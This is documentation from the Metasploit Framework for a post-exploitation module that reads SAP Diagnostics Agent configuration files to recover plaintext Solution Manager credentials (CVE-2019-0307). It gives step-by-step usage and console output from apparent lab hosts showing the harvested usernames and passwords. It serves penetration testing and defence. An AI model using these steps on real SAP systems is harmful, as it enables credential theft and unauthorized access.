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GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/post/multi/sap/
Views: 1904

Vulnerable Application

This module retrieves the file on a SMDAgent. This file contains the credentials used by the SMDAgent to connect to the SAP Solution Manager server.

Verification Steps

  1. Get a shell or meterpreter session on some host.

  2. Do: use post/multi/sap/smdagent_get_properties

  3. Do: set SESSION [SESSION_ID], replacing [SESSION_ID] with the session number you wish to run this one.

  4. Do: run

  5. If the system has configuration files containing unencrypted credentials for the SAP Solution Manager server, they will be printed out.




msf6 post(multi/sap/smdagent_get_properties) > sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 shell linux SSH daaadm:TestPass1 ( -> ( 2 meterpreter x64/windows SAP731\Administrator @ SAP731 -> ( msf6 post(multi/sap/smdagent_get_properties) > set SESSION 1 SESSION => 1 msf6 post(multi/sap/smdagent_get_properties) > run [+] File /usr/sap/DAA/SMDA98/SMDAgent/configuration/ saved in: /Users/vladimir/.msf4/loot/20210329205801_SAP_TEST_172.16.30.14_smdagent.propert_457968.txt [+] File /usr/sap/DAA/SMDA98/SMDAgent/configuration/ saved in: /Users/vladimir/.msf4/loot/20210329205811_SAP_TEST_172.16.30.14_smdagent.propert_587689.txt [*] Instance: SMDA98 [*] Runtime properties file name: /usr/sap/DAA/SMDA98/SMDAgent/configuration/ [*] Secstore properties file name: /usr/sap/DAA/SMDA98/SMDAgent/configuration/ [*] SLD properties: [*] SLD protocol: http [*] SLD hostname: [*] SLD port: 50000 [+] SLD username: j2ee_admin [+] SLD password: asdQWE123 [*] SMD properties: [*] SMD url: p4:// [+] SMD username: j2ee_admin [+] SMD password: asdQWE123 [+] Store decoded credentials for SolMan server [*] Post module execution completed msf6 post(multi/sap/smdagent_get_properties) > set SESSION 2 SESSION => 2 msf6 post(multi/sap/smdagent_get_properties) > run [+] File c:\usr\sap\DAA\SMDA97\SMDAgent\configuration\ saved in: /Users/vladimir/.msf4/loot/20210329205823_SAP_TEST_172.16.30.80_smdagent.propert_357417.txt [+] File c:\usr\sap\DAA\SMDA97\SMDAgent\configuration\ saved in: /Users/vladimir/.msf4/loot/20210329205823_SAP_TEST_172.16.30.80_smdagent.propert_604626.txt [*] Instance: SMDA97 [*] Runtime properties file name: c:\usr\sap\DAA\SMDA97\SMDAgent\configuration\ [*] Secstore properties file name: c:\usr\sap\DAA\SMDA97\SMDAgent\configuration\ [*] SLD properties: [*] SLD protocol: http [*] SLD hostname: [*] SLD port: 50000 [+] SLD username: SLDDSUSER [+] SLD password: asdQWE123 [*] SMD properties: [*] SMD url: p4:// [+] SMD username: j2ee_admin [+] SMD password: asdQWE123 [+] Store decoded credentials for SolMan server [*] Post module execution completed msf6 post(multi/sap/smdagent_get_properties) > creds Credentials =========== host origin service public private realm private_type JtR Format ---- ------ ------- ------ ------- ----- ------------ ---------- 50000/tcp (http) j2ee_admin asdQWE123 Password 50000/tcp (http) SLDDSUSER asdQWE123 Password msf6 post(multi/sap/smdagent_get_properties) > services Services ======== host port proto name state info ---- ---- ----- ---- ----- ---- 50000 tcp soap open SAP Solution Manager msf6 post(multi/sap/smdagent_get_properties) > vulns Vulnerabilities =============== Timestamp Host Name References --------- ---- ---- ---------- 2021-03-29 17:58:11 UTC Diagnostics Agent in Solution Manager, stores unencrypted CVE-2019-0307,URL- credentials for Solution Manager server 002/materials/D2T1%20-%20SAP%20RCE%20-%20The%20Agent%20Who %20Spoke%20Too%20Much%20-%20Yvan%20Genuer.pdf 2021-03-29 17:58:23 UTC Diagnostics Agent in Solution Manager, stores unencrypted CVE-2019-0307,URL- credentials for Solution Manager server 002/materials/D2T1%20-%20SAP%20RCE%20-%20The%20Agent%20Who %20Spoke%20Too%20Much%20-%20Yvan%20Genuer.pdf